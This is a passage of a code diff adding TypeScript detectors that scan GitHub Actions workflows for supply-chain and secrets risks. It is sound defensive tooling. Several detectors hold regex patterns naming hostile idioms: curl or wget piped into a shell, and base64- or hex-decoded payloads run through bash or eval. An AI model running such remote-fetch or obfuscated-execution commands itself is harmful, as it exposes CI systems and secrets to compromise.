asRecord(jobValue); + if (!job) { + continue; + } + + const container = asRecord(job.container); + if (typeof container?.image === "string") { + targets.push({ + field: `jobs.${jobId}.container.image`, + image: container.image, + }); + } + + const services = asRecord(job.services); + if (!services) { + continue; + } + + for (const [serviceName, serviceValue] of Object.entries(services)) { + const service = asRecord(serviceValue); + if (typeof service?.image === "string") { + targets.push({ + field: `jobs.${jobId}.services.${serviceName}.image`, + image: service.image, + }); + } + } + } + + return targets; +} + +function hasEmbeddedCredentials(image: string): boolean { + const value = image.trim(); + return CREDENTIAL_IN_IMAGE_PATTERNS.some((pattern) => pattern.test(value)); +} + +export function detectWorkflowHardcodedContainerCredentials( + input: WorkflowHardcodedContainerCredentialsInput, +): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const findings: Finding[] = []; + for (const target of gatherImageTargets(input.parsed)) { + if (!hasEmbeddedCredentials(target.image)) { + continue; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [target.image, "image:"], + fallbackValue: target.image, + }); + + findings.push({ + rule_id: "hardcoded-container-credentials", + finding_id: `HARDCODED_CONTAINER_CREDENTIALS-${input.filePath}-${target.field}`, + severity: "HIGH", + category: "CI_SUPPLY_CHAIN", + layer: "L2", + file_path: input.filePath, + location: { field: target.field }, + description: "Container image reference appears to embed static credentials", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-798", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Remove embedded credentials from image references and use short-lived registry auth", + ], + 
evidence: evidence?.evidence ?? null, + suppressed: false, + }); + } + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-impostor-commit.ts b/src/layer2-static/detectors/workflow-impostor-commit.ts new file mode 100644 index 0000000..d5dd813 --- /dev/null +++ b/src/layer2-static/detectors/workflow-impostor-commit.ts @@ -0,0 +1,170 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { RuntimeMode } from "../../config.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowImpostorCommitInput { + filePath: string; + parsed: unknown; + textContent: string; + runtimeMode?: RuntimeMode; +} + +interface ParsedUsesLine { + lineNumber: number; + column: number; + rawLine: string; + uses: string; +} + +const GITHUB_API_HEADERS = { + Accept: "application/vnd.github+json", +} as const; + +function splitOwnerRepo(slug: string): { owner: string; repo: string } | null { + const firstSlash = slug.indexOf("/"); + if (firstSlash < 0) { + return null; + } + + const owner = slug.slice(0, firstSlash); + const repo = slug.slice(firstSlash + 1).split("/")[0]; + if (!owner || !repo) { + return null; + } + + return { owner, repo }; +} + +function isPinnedToCommit(ref: string): boolean { + return /^[a-f0-9]{40}$/iu.test(ref.trim()); +} + +function parseRepositoryUses(value: string): { slug: string; ref: string } | null { + const trimmed = value.trim(); + if (trimmed.startsWith("./") || trimmed.startsWith("docker://")) { + return null; + } + + const atIndex = trimmed.lastIndexOf("@"); + if (atIndex < 0) { + return null; + } + + const slug = trimmed.slice(0, atIndex).trim().replace(/\/+$/u, "").toLowerCase(); + const ref = trimmed.slice(atIndex + 1).trim(); + if (!slug.includes("/") || ref.length === 0) { + return null; + } + + return { slug, ref }; +} + +function parseUsesLine(line: string, lineNumber: number): ParsedUsesLine | null 
{ + const match = line.match(/^\s*(?:-\s*)?uses:\s*([^#]+?)(?:\s*#.*)?\s*$/iu); + if (!match?.[1]) { + return null; + } + + const uses = match[1].trim(); + const usesColumn = line.indexOf("uses:"); + return { + lineNumber, + column: usesColumn >= 0 ? usesColumn + 1 : 1, + rawLine: line, + uses, + }; +} + +async function fetchGitHubJson(url: string): Promise { + try { + const response = await fetch(url, { + headers: GITHUB_API_HEADERS, + }); + + if (!response.ok) { + return null; + } + + return (await response.json()) as unknown; + } catch { + return null; + } +} + +async function repositoryHasCommit(owner: string, repo: string, sha: string): Promise { + const url = `https://api.github.com/repos/${owner}/${repo}/commits/${encodeURIComponent(sha)}`; + const payload = (await fetchGitHubJson(url)) as { sha?: string } | null; + return typeof payload?.sha === "string" && payload.sha.length > 0; +} + +export async function detectWorkflowImpostorCommit( + input: WorkflowImpostorCommitInput, +): Promise { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + if (!extractWorkflowFacts(input.parsed)) { + return []; + } + + const mode = input.runtimeMode ?? 
"offline"; + if (mode !== "online") { + return []; + } + + const findings: Finding[] = []; + const lines = input.textContent.split(/\r?\n/u); + + for (const [index, line] of lines.entries()) { + const parsedLine = parseUsesLine(line, index + 1); + if (!parsedLine) { + continue; + } + + const parsedUses = parseRepositoryUses(parsedLine.uses); + if (!parsedUses || !isPinnedToCommit(parsedUses.ref)) { + continue; + } + + const ownerRepo = splitOwnerRepo(parsedUses.slug); + if (!ownerRepo) { + continue; + } + + if (await repositoryHasCommit(ownerRepo.owner, ownerRepo.repo, parsedUses.ref)) { + continue; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [parsedLine.rawLine, parsedUses.ref, parsedUses.slug], + fallbackValue: parsedLine.rawLine.trim(), + }); + + findings.push({ + rule_id: "workflow-impostor-commit", + finding_id: `WORKFLOW_IMPOSTOR_COMMIT-${input.filePath}-${index + 1}`, + severity: "HIGH", + category: "CI_SUPPLY_CHAIN", + layer: "L2", + file_path: input.filePath, + location: { line: parsedLine.lineNumber, column: parsedLine.column }, + description: "Pinned action commit is not present in the referenced repository", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-829", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Pin the action to a commit that exists in the referenced repository and review the upstream history before updating", + ], + evidence: evidence?.evidence ?? 
parsedLine.rawLine.trim(), + suppressed: false, + }); + } + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-insecure-commands.ts b/src/layer2-static/detectors/workflow-insecure-commands.ts new file mode 100644 index 0000000..e589dcd --- /dev/null +++ b/src/layer2-static/detectors/workflow-insecure-commands.ts @@ -0,0 +1,92 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowInsecureCommandsInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +const INSECURE_COMMAND_PATTERNS: Array<{ pattern: RegExp; description: string }> = [ + { + pattern: /\b(?:curl|wget)\b[\s\S]*?\|\s*(?:sh|bash)\b/iu, + description: "remote download piped directly into a shell", + }, + { + pattern: /\bbash\s*<\s*\(\s*curl\b/iu, + description: "process substitution executes downloaded shell content", + }, + { + pattern: /\bsh\s*<\s*\(\s*curl\b/iu, + description: "process substitution executes downloaded shell content", + }, +]; + +function findInsecureCommand( + run: string | undefined, +): { match: string; description: string } | null { + if (typeof run !== "string") { + return null; + } + + for (const entry of INSECURE_COMMAND_PATTERNS) { + if (entry.pattern.test(run)) { + return { match: run, description: entry.description }; + } + } + + return null; +} + +export function detectWorkflowInsecureCommands(input: WorkflowInsecureCommandsInput): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const findings: Finding[] = []; + + facts.jobs.forEach((job, jobIndex) => { + job.steps.forEach((step, stepIndex) => { + const insecure = findInsecureCommand(step.run); + if (!insecure) { + return; + } + + const evidence = buildFindingEvidence({ + textContent: 
input.textContent, + searchTerms: [insecure.match], + fallbackValue: insecure.match, + }); + + findings.push({ + rule_id: "workflow-insecure-commands", + finding_id: `WORKFLOW_INSECURE_COMMANDS-${input.filePath}-${jobIndex}-${stepIndex}`, + severity: "HIGH", + category: "COMMAND_EXEC", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${job.id}.steps[${stepIndex}].run` }, + description: `Workflow uses ${insecure.description}`, + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-78", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Download artifacts separately, verify integrity, and run them only after review", + ], + evidence: evidence?.evidence ?? null, + suppressed: false, + }); + }); + }); + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-known-vuln-action.ts b/src/layer2-static/detectors/workflow-known-vuln-action.ts new file mode 100644 index 0000000..d28dfce --- /dev/null +++ b/src/layer2-static/detectors/workflow-known-vuln-action.ts @@ -0,0 +1,89 @@ +import type { RuntimeMode } from "../../config.js"; +import type { Finding } from "../../types/finding.js"; +import { loadKnownVulnerableActions } from "../advisories/gha-advisory-client.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowKnownVulnActionInput { + filePath: string; + parsed: unknown; + runtimeMode?: RuntimeMode; +} + +function parseRepositoryUses(value: string): { slug: string; ref: string } | null { + const trimmed = value.trim(); + if (trimmed.startsWith("./") || trimmed.startsWith("docker://")) { + return null; + } + + const atIndex = trimmed.lastIndexOf("@"); + if (atIndex < 0) { + return null; + } + + const slug = trimmed.slice(0, atIndex).toLowerCase(); + const ref = trimmed.slice(atIndex + 1).toLowerCase(); + if (!slug.includes("/") || ref.length === 0) { + return null; + } + + return { slug, ref }; +} + +export function 
detectWorkflowKnownVulnAction(input: WorkflowKnownVulnActionInput): Finding[] { + if (input.runtimeMode !== "online") { + return []; + } + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const advisories = loadKnownVulnerableActions({ runtimeMode: input.runtimeMode }).advisories; + const findings: Finding[] = []; + + facts.jobs.forEach((job, jobIndex) => { + job.steps.forEach((step, stepIndex) => { + const uses = step.uses; + if (!uses) { + return; + } + const parsedUses = parseRepositoryUses(uses); + if (!parsedUses) { + return; + } + + const vulnerableVersions = advisories[parsedUses.slug]; + if (!vulnerableVersions || !vulnerableVersions.includes(parsedUses.ref)) { + return; + } + + findings.push({ + rule_id: "workflow-known-vuln-action", + finding_id: `WORKFLOW_KNOWN_VULN_ACTION-${input.filePath}-${jobIndex}-${stepIndex}`, + severity: "HIGH", + category: "CI_VULNERABLE_ACTION", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${job.id}.steps[${stepIndex}].uses` }, + description: `Action ${parsedUses.slug}@${parsedUses.ref} is listed in known vulnerable references`, + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-937", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Upgrade to a non-vulnerable action release and pin to a reviewed commit SHA", + ], + evidence: uses, + suppressed: false, + }); + }); + }); + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-misfeature.ts b/src/layer2-static/detectors/workflow-misfeature.ts new file mode 100644 index 0000000..57c1d07 --- /dev/null +++ b/src/layer2-static/detectors/workflow-misfeature.ts @@ -0,0 +1,132 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export 
interface WorkflowMisfeatureInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +interface StepCandidate { + jobId: string; + stepIndex: number; + name?: string; + run?: string; + uses?: string; + continueOnError: boolean; +} + +const SECURITY_TOKENS = [ + "codeql", + "security", + "sast", + "secret", + "dependency review", + "npm audit", + "trivy", +]; + +function asRecord(value: unknown): Record | null { + if (!value || typeof value !== "object" || Array.isArray(value)) { + return null; + } + return value as Record; +} + +function isContinueOnErrorEnabled(value: unknown): boolean { + if (value === true) { + return true; + } + return typeof value === "string" && value.trim().toLowerCase() === "true"; +} + +function isSecurityStep(candidate: StepCandidate): boolean { + const combined = [candidate.name, candidate.run, candidate.uses] + .filter((value): value is string => typeof value === "string") + .join(" ") + .toLowerCase(); + return SECURITY_TOKENS.some((token) => combined.includes(token)); +} + +function gatherCandidates(parsed: unknown): StepCandidate[] { + const root = asRecord(parsed); + const jobs = asRecord(root?.jobs); + if (!jobs) { + return []; + } + + const candidates: StepCandidate[] = []; + for (const [jobId, jobValue] of Object.entries(jobs)) { + const job = asRecord(jobValue); + const steps = Array.isArray(job?.steps) ? job.steps : []; + steps.forEach((stepValue, stepIndex) => { + const step = asRecord(stepValue); + if (!step) { + return; + } + candidates.push({ + jobId, + stepIndex, + name: typeof step.name === "string" ? step.name : undefined, + run: typeof step.run === "string" ? step.run : undefined, + uses: typeof step.uses === "string" ? 
step.uses : undefined, + continueOnError: isContinueOnErrorEnabled(step["continue-on-error"]), + }); + }); + } + + return candidates; +} + +export function detectWorkflowMisfeature(input: WorkflowMisfeatureInput): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const findings: Finding[] = []; + + for (const candidate of gatherCandidates(input.parsed)) { + if (!candidate.continueOnError || !isSecurityStep(candidate)) { + continue; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: ["continue-on-error: true", candidate.run ?? "", candidate.name ?? ""], + fallbackValue: "security step continues on error", + }); + + findings.push({ + rule_id: "workflow-misfeature", + finding_id: `WORKFLOW_MISFEATURE-${input.filePath}-${candidate.jobId}-${candidate.stepIndex}`, + severity: "MEDIUM", + category: "CI_TRIGGER", + layer: "L2", + file_path: input.filePath, + location: { + field: `jobs.${candidate.jobId}.steps[${candidate.stepIndex}].continue-on-error`, + }, + description: + "Security-relevant step is configured with continue-on-error, which can hide failed checks", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-703", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Remove continue-on-error from security-critical steps or split non-blocking diagnostics into separate jobs", + ], + evidence: evidence?.evidence ?? 
null, + suppressed: false, + }); + } + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-obfuscation.ts b/src/layer2-static/detectors/workflow-obfuscation.ts new file mode 100644 index 0000000..16673b9 --- /dev/null +++ b/src/layer2-static/detectors/workflow-obfuscation.ts @@ -0,0 +1,94 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowObfuscationInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +const OBFUSCATION_PATTERNS: Array<{ pattern: RegExp; description: string }> = [ + { + pattern: /\bbase64\s+-d\b/iu, + description: "runtime decoding of base64-encoded payload data", + }, + { + pattern: /\bbase64\s+-d\b[\s\S]*\|\s*(?:bash|sh)\b/iu, + description: "base64-decoded payload piped into a shell", + }, + { + pattern: /\beval\b[\s\S]*\$\([^)]+base64[^)]*\)/iu, + description: "eval executes command substitution that decodes base64 content", + }, + { + pattern: /\bprintf\b[\s\S]*\\x[0-9a-f]{2}/iu, + description: "hex-encoded shell payload reconstruction", + }, +]; + +function detectObfuscation(run: string | undefined): { run: string; description: string } | null { + if (!run) { + return null; + } + for (const entry of OBFUSCATION_PATTERNS) { + if (entry.pattern.test(run)) { + return { + run, + description: entry.description, + }; + } + } + return null; +} + +export function detectWorkflowObfuscation(input: WorkflowObfuscationInput): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const findings: Finding[] = []; + facts.jobs.forEach((job, jobIndex) => { + job.steps.forEach((step, stepIndex) => { + const match = detectObfuscation(step.run); + if (!match) { + return; + } + + const evidence = buildFindingEvidence({ + textContent: 
input.textContent, + searchTerms: [match.run, "base64", "eval"], + fallbackValue: match.run, + }); + + findings.push({ + rule_id: "workflow-obfuscation", + finding_id: `WORKFLOW_OBFUSCATION-${input.filePath}-${jobIndex}-${stepIndex}`, + severity: "HIGH", + category: "COMMAND_EXEC", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${job.id}.steps[${stepIndex}].run` }, + description: `Workflow run step uses obfuscated command execution (${match.description})`, + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-506", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Replace obfuscated command pipelines with explicit, reviewable commands and integrity checks", + ], + evidence: evidence?.evidence ?? null, + suppressed: false, + }); + }); + }); + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-overprovisioned-secrets.ts b/src/layer2-static/detectors/workflow-overprovisioned-secrets.ts new file mode 100644 index 0000000..d481ccc --- /dev/null +++ b/src/layer2-static/detectors/workflow-overprovisioned-secrets.ts @@ -0,0 +1,106 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowOverprovisionedSecretsInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +const FULL_SECRETS_SERIALIZATION = /\btojson\s*\(\s*secrets\s*\)/iu; + +function asRecord(value: unknown): Record | null { + if (!value || typeof value !== "object" || Array.isArray(value)) { + return null; + } + return value as Record; +} + +function appendPath(base: string, segment: string | number): string { + if (typeof segment === "number") { + return `${base}[${segment}]`; + } + return base.length > 0 ? 
`${base}.${segment}` : segment; +} + +function findSerializedSecrets( + value: unknown, + path: string, +): { path: string; value: string } | null { + if (typeof value === "string") { + return FULL_SECRETS_SERIALIZATION.test(value) ? { path, value } : null; + } + + if (Array.isArray(value)) { + for (let index = 0; index < value.length; index += 1) { + const found = findSerializedSecrets(value[index], appendPath(path, index)); + if (found) { + return found; + } + } + return null; + } + + const record = asRecord(value); + if (!record) { + return null; + } + + for (const [key, child] of Object.entries(record)) { + const found = findSerializedSecrets(child, appendPath(path, key)); + if (found) { + return found; + } + } + + return null; +} + +export function detectWorkflowOverprovisionedSecrets( + input: WorkflowOverprovisionedSecretsInput, +): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const found = findSerializedSecrets(input.parsed, ""); + if (!found) { + return []; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [found.value, "toJSON(secrets)", "toJson(secrets)"], + fallbackValue: found.value, + }); + + return [ + { + rule_id: "workflow-overprovisioned-secrets", + finding_id: `WORKFLOW_OVERPROVISIONED_SECRETS-${input.filePath}`, + severity: "HIGH", + category: "CI_PERMISSIONS", + layer: "L2", + file_path: input.filePath, + location: { field: found.path }, + description: "Workflow serializes the entire secrets context", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-200", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Reference only the specific secrets each step needs instead of serializing the full secrets context", + ], + evidence: evidence?.evidence ?? 
null, + suppressed: false, + }, + ]; +} diff --git a/src/layer2-static/detectors/workflow-ref-confusion.ts b/src/layer2-static/detectors/workflow-ref-confusion.ts new file mode 100644 index 0000000..7c5bb54 --- /dev/null +++ b/src/layer2-static/detectors/workflow-ref-confusion.ts @@ -0,0 +1,91 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowRefConfusionInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +const HASH_PINNED_REF_RE = /^[a-f0-9]{40}$/iu; + +function parseRepositoryUses(value: string): { slug: string; ref: string } | null { + const trimmed = value.trim(); + if (trimmed.startsWith("./") || trimmed.startsWith("docker://")) { + return null; + } + + const atIndex = trimmed.lastIndexOf("@"); + if (atIndex < 0) { + return null; + } + + const slug = trimmed.slice(0, atIndex).trim().replace(/\/+$/u, "").toLowerCase(); + const ref = trimmed.slice(atIndex + 1).trim(); + if (slug.length === 0 || !slug.includes("/") || ref.length === 0) { + return null; + } + + return { slug, ref }; +} + +function isHashPinned(ref: string): boolean { + return HASH_PINNED_REF_RE.test(ref.trim()); +} + +export function detectWorkflowRefConfusion(input: WorkflowRefConfusionInput): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const findings: Finding[] = []; + + for (const [jobIndex, job] of facts.jobs.entries()) { + for (const [stepIndex, step] of job.steps.entries()) { + const uses = step.uses?.trim(); + if (!uses) { + continue; + } + + const parsedUses = parseRepositoryUses(uses); + if (!parsedUses || isHashPinned(parsedUses.ref)) { + continue; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [uses], + fallbackValue: 
`uses: ${uses}`, + }); + + findings.push({ + rule_id: "workflow-ref-confusion", + finding_id: `WORKFLOW_REF_CONFUSION-${input.filePath}-${jobIndex}-${stepIndex}`, + severity: "HIGH", + category: "CI_VULNERABLE_ACTION", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${job.id}.steps[${stepIndex}].uses` }, + description: + "Workflow action is pinned to a symbolic ref instead of an immutable commit hash", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-829", + confidence: "HIGH", + fixable: false, + remediation_actions: ["Pin external actions to a full commit SHA"], + evidence: evidence?.evidence ?? null, + suppressed: false, + }); + } + } + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-ref-version-mismatch.ts b/src/layer2-static/detectors/workflow-ref-version-mismatch.ts new file mode 100644 index 0000000..bfa4573 --- /dev/null +++ b/src/layer2-static/detectors/workflow-ref-version-mismatch.ts @@ -0,0 +1,251 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { RuntimeMode } from "../../config.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowRefVersionMismatchInput { + filePath: string; + parsed: unknown; + textContent: string; + runtimeMode?: RuntimeMode; +} + +const VERSION_COMMENT_PATTERNS = [ + /#\s*tag\s*=\s*(v\d+(?:\.\d+)*(?:\.\d+)?)/iu, + /#\s*(v\d+(?:\.\d+)*(?:\.\d+)?)/iu, + /#\s*tag\s*=\s*(\d+(?:\.\d+)*(?:\.\d+)?)/iu, + /#\s*(?:version|ver)\s*[:=]\s*(v?\d+(?:\.\d+)*(?:\.\d+)?)/iu, +]; +const GITHUB_API_HEADERS = { + Accept: "application/vnd.github+json", +} as const; +const MAX_TAG_DEPTH = 8; + +interface ParsedUsesLine { + lineNumber: number; + column: number; + rawLine: string; + uses: string; + versionComment: string; +} + +function splitOwnerRepo(slug: string): { owner: string; repo: string } | null { + const firstSlash = 
slug.indexOf("/"); + if (firstSlash < 0) { + return null; + } + + const owner = slug.slice(0, firstSlash); + const repo = slug.slice(firstSlash + 1).split("/")[0]; + if (!owner || !repo) { + return null; + } + + return { owner, repo }; +} + +function isPinnedToCommit(ref: string): boolean { + return /^[a-f0-9]{40}$/iu.test(ref.trim()); +} + +function parseRepositoryUses(value: string): { slug: string; ref: string } | null { + const trimmed = value.trim(); + if (trimmed.startsWith("./") || trimmed.startsWith("docker://")) { + return null; + } + + const atIndex = trimmed.lastIndexOf("@"); + if (atIndex < 0) { + return null; + } + + const slug = trimmed.slice(0, atIndex).trim().replace(/\/+$/u, "").toLowerCase(); + const ref = trimmed.slice(atIndex + 1).trim(); + if (!slug.includes("/") || ref.length === 0) { + return null; + } + + return { slug, ref }; +} + +function extractVersionComment(line: string): string | null { + for (const pattern of VERSION_COMMENT_PATTERNS) { + const match = line.match(pattern); + if (match?.[1]) { + return match[1]; + } + } + + return null; +} + +function parseUsesLine(line: string, lineNumber: number): ParsedUsesLine | null { + const match = line.match(/^\s*(?:-\s*)?uses:\s*([^#]+?)(?:\s*#\s*(.+))?\s*$/iu); + if (!match?.[1]) { + return null; + } + + const uses = match[1].trim(); + const versionComment = extractVersionComment(line); + if (!versionComment) { + return null; + } + + const usesColumn = line.indexOf("uses:"); + return { + lineNumber, + column: usesColumn >= 0 ? 
usesColumn + 1 : 1, + rawLine: line, + uses, + versionComment, + }; +} + +async function fetchGitHubJson(url: string): Promise { + try { + const response = await fetch(url, { + headers: GITHUB_API_HEADERS, + }); + + if (!response.ok) { + return null; + } + + return (await response.json()) as unknown; + } catch { + return null; + } +} + +async function resolveTagCommitSha( + owner: string, + repo: string, + tag: string, +): Promise { + const normalizedTag = tag.trim(); + if (normalizedTag.length === 0) { + return null; + } + + const refUrl = `https://api.github.com/repos/${owner}/${repo}/git/ref/tags/${encodeURIComponent( + normalizedTag, + )}`; + const ref = (await fetchGitHubJson(refUrl)) as { + object?: { type?: string; sha?: string }; + } | null; + if (!ref?.object?.sha || !ref.object.type) { + return null; + } + + if (ref.object.type === "commit") { + return ref.object.sha; + } + + if (ref.object.type !== "tag") { + return null; + } + + const seenObjects = new Set([ref.object.sha]); + let tagObjectSha = ref.object.sha; + + for (let depth = 0; depth < MAX_TAG_DEPTH; depth += 1) { + const tagUrl = `https://api.github.com/repos/${owner}/${repo}/git/tags/${tagObjectSha}`; + const tagObject = (await fetchGitHubJson(tagUrl)) as { + object?: { type?: string; sha?: string }; + } | null; + + if (!tagObject?.object?.sha || !tagObject.object.type) { + return null; + } + + if (tagObject.object.type === "commit") { + return tagObject.object.sha; + } + + if (tagObject.object.type !== "tag" || seenObjects.has(tagObject.object.sha)) { + return null; + } + + seenObjects.add(tagObject.object.sha); + tagObjectSha = tagObject.object.sha; + } + + return null; +} + +export async function detectWorkflowRefVersionMismatch( + input: WorkflowRefVersionMismatchInput, +): Promise { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + if (!extractWorkflowFacts(input.parsed)) { + return []; + } + + const mode = input.runtimeMode ?? 
"offline"; + if (mode !== "online") { + return []; + } + + const findings: Finding[] = []; + const lines = input.textContent.split(/\r?\n/u); + + for (const [index, line] of lines.entries()) { + const parsedLine = parseUsesLine(line, index + 1); + if (!parsedLine) { + continue; + } + + const parsedUses = parseRepositoryUses(parsedLine.uses); + if (!parsedUses || !isPinnedToCommit(parsedUses.ref)) { + continue; + } + + const ownerRepo = splitOwnerRepo(parsedUses.slug); + if (!ownerRepo) { + continue; + } + + const matchedCommit = await resolveTagCommitSha( + ownerRepo.owner, + ownerRepo.repo, + parsedLine.versionComment, + ); + + if (!matchedCommit || matchedCommit === parsedUses.ref) { + continue; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [parsedLine.rawLine, parsedLine.versionComment, parsedUses.ref], + fallbackValue: parsedLine.rawLine.trim(), + }); + + findings.push({ + rule_id: "workflow-ref-version-mismatch", + finding_id: `WORKFLOW_REF_VERSION_MISMATCH-${input.filePath}-${index + 1}`, + severity: "MEDIUM", + category: "CI_SUPPLY_CHAIN", + layer: "L2", + file_path: input.filePath, + location: { line: parsedLine.lineNumber, column: parsedLine.column }, + description: "Hash-pinned action commit does not match its version comment tag", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-829", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Update the version comment to match the pinned commit or repin the action to the intended release tag", + ], + evidence: evidence?.evidence ?? 
parsedLine.rawLine.trim(), + suppressed: false, + }); + } + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-secrets-inherit.ts b/src/layer2-static/detectors/workflow-secrets-inherit.ts new file mode 100644 index 0000000..89cddc9 --- /dev/null +++ b/src/layer2-static/detectors/workflow-secrets-inherit.ts @@ -0,0 +1,78 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowSecretsInheritInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +function asRecord(value: unknown): Record | null { + if (!value || typeof value !== "object" || Array.isArray(value)) { + return null; + } + return value as Record; +} + +function isReusableWorkflowCall(uses: unknown): uses is string { + return typeof uses === "string" && uses.includes("/.github/workflows/"); +} + +function isInheritSecrets(value: unknown): boolean { + return typeof value === "string" && value.trim().toLowerCase() === "inherit"; +} + +export function detectWorkflowSecretsInherit(input: WorkflowSecretsInheritInput): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + const root = asRecord(input.parsed); + const jobsRecord = asRecord(root?.jobs); + if (!facts || !jobsRecord) { + return []; + } + + const findings: Finding[] = []; + + for (const job of facts.jobs) { + const jobRecord = asRecord(jobsRecord[job.id]); + if ( + !jobRecord || + !isReusableWorkflowCall(jobRecord.uses) || + !isInheritSecrets(jobRecord.secrets) + ) { + continue; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: ["secrets: inherit", "inherit"], + fallbackValue: "secrets: inherit", + }); + + findings.push({ + rule_id: "workflow-secrets-inherit", + finding_id: 
`WORKFLOW_SECRETS_INHERIT-${input.filePath}-${job.id}`, + severity: "HIGH", + category: "CI_PERMISSIONS", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${job.id}.secrets` }, + description: "Reusable workflow call inherits all repository secrets", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-200", + confidence: "HIGH", + fixable: false, + remediation_actions: ["Pass only the specific secrets required by the reusable workflow"], + evidence: evidence?.evidence ?? null, + suppressed: false, + }); + } + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-secrets-outside-env.ts b/src/layer2-static/detectors/workflow-secrets-outside-env.ts new file mode 100644 index 0000000..3ac8a98 --- /dev/null +++ b/src/layer2-static/detectors/workflow-secrets-outside-env.ts @@ -0,0 +1,124 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowSecretsOutsideEnvInput { + filePath: string; + parsed: 